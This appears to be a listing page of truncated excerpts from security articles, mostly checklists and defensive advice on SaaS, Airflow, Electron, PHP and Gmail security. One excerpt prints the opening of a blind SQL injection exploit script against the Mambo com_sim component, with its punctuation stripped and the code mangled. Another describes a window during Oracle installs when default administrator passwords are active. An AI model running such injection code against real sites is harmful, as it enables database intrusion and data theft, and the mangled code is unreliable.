The Ultimate SaaS Security Posture Management Checklist, 2025 Edition

Since the first edition of The Ultimate SaaS Security Posture Management SSPM Checklist was released three years ago, the corporate SaaS sprawl has been growing at a double-digit pace. In large enterprises, the number of SaaS applications in use today is in the hundreds, spread across departmenta...

Holiday Readiness, Part Two: What you Should be Thinking About Three Months Out?Capacity Planning

Welcome back to the Holiday Readiness blog series. We hope part one has kept you busy over the past month as you continue to improve your security posture. If you haven?t finished all of the security checklist items, don?t worry ? there is still time before Black Friday and Cyber Monday...

Holiday Readiness: What You Should Be Thinking About Four Months Out

Written by: Michael Hansen This is a blog series about Akamai solutions that can help you manage the surge of traffic both good and bad that will be hitting the retail industry during the holiday season. The beginning of August is upon us, and if you haven't already started thinking about the...

Post-Pandemic world, Shut-downs, and Web Security Connections

As the anniversary of the World Health Organization’s WHO declaration of the COVID-19 pandemic approaches, we, here in Silicon Valley, have great hope for 2021. As the vaccine distribution continues to trickle to Main Street, Californians have recently exited a stay-at-home mandate that has nearl...

COVID-19 CISO Checklist for Securing a Remote Workforce

The Coronavirus crisis introduces a heavy burden on the CISO with the joint impact of a mass transition to working remotely coupled with a surge of cyberattacks that strive to monetize the general chaos. Security vendors, unintendedly, contribute to this burden by a relentless generation of noise...

Airflowscan - Checklist And Tools For Increasing Security Of Apache Airflow

Checklist and tools for increasing security of Apache Airflow. DISCLAIMER This project NOT AFFILIATED with the Apache Foundation and the Airflow project, and is not endorsed by them. Contents The purpose of this project is provide tools to increase security of Apache Airflow. installations. This...

XXE Vulnerability

This is: - a bugfix - a new feature - X security Checklist: - X Changes are covered by unit tests - X Code style is respected - X Commit message explains why the change is made see https://github.com/erlang/otp/wiki/Writing-good-commit-messages - X CHANGELOG.md contains a short summary of the...

PHP Security Check List

PHP: Hypertext Preprocessor is a web-based, server-side, multi-use, general-purpose, scripting and programming language that can be embedded in HTML. The PHP development, which was first created by Rasmus Lerdorf in 1995, is now being run by the PHP community. The PHP programming language is stil...

Electronegativity - Tool To Identify Misconfigurations And Security Anti-Patterns In Electron Applications

Electronegativity is a tool to identify misconfigurations and security anti-patterns in Electron-based applications. It leverages AST and DOM parsing to look for security-relevant configurations, as described in the "Electron Security Checklist - A Guide for Developers and Auditors" whitepaper...

HTTPS client certificate authentication security issues. Part 1/3

Sometimes we need to improve web authentication by client certificates. It’s much better than passwords, allows to enable 2nd factor because of hardware keys and just sounds so strong, isn’t it? ; Let’s look inside it to understand how secure is it and what to check to be sure, that you didn’t...

Back to school cybersecurity tips for parents and kids

The time to start the new school term is just around the corner. And for parents, the excitement and anxiety may be palpable, especially if it's their kid's first time attending a new school. Ads for back-to-school gear start as early as July, increasing in frequency and urgency until the kiddos...

Fedora Update for postfix FEDORA-2011-6777

The remote host is missing an update for the SPDX-FileCopyrightText: 2011 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription scriptxrefname:"URL",...

Google Unveils Gmail Security Checklist

In the face of continued attacks targeting its hugely popular Gmail service, Google has put together a checklist to help Gmail users better secure their accounts by looking at the settings in their inboxes, their browsers and their PCs. The security guide doesn’t automate any of these tasks for...

Mambo Component com_sim 0.8 - Blind SQL Injection

Mambo Component comsim 0.8 - Blind SQL Injection xoron 1 $url = $argv1; $r = strlenfilegetcontents$url."+and+1=1--"; echo "\nExploiting:\n"; $w = strlenfilegetcontents$url."+and+1=0--"; $t = abs100-$w/$r100; echo "Username: "; for $i=1; $i $t-1 $count = $i; $i = 30; for $j = 1; $j $t-1 $laenge =...

Oracle 11g/10g Installation Vulnerability

Hey all, After investigating 11g the other day I came across an interesting issue. During the installation of Oracle 11g and 10g all accounts, including the SYS and SYSTEM accounts, have their default passwords and only at the end of the install are the passwords changed. This means that there is...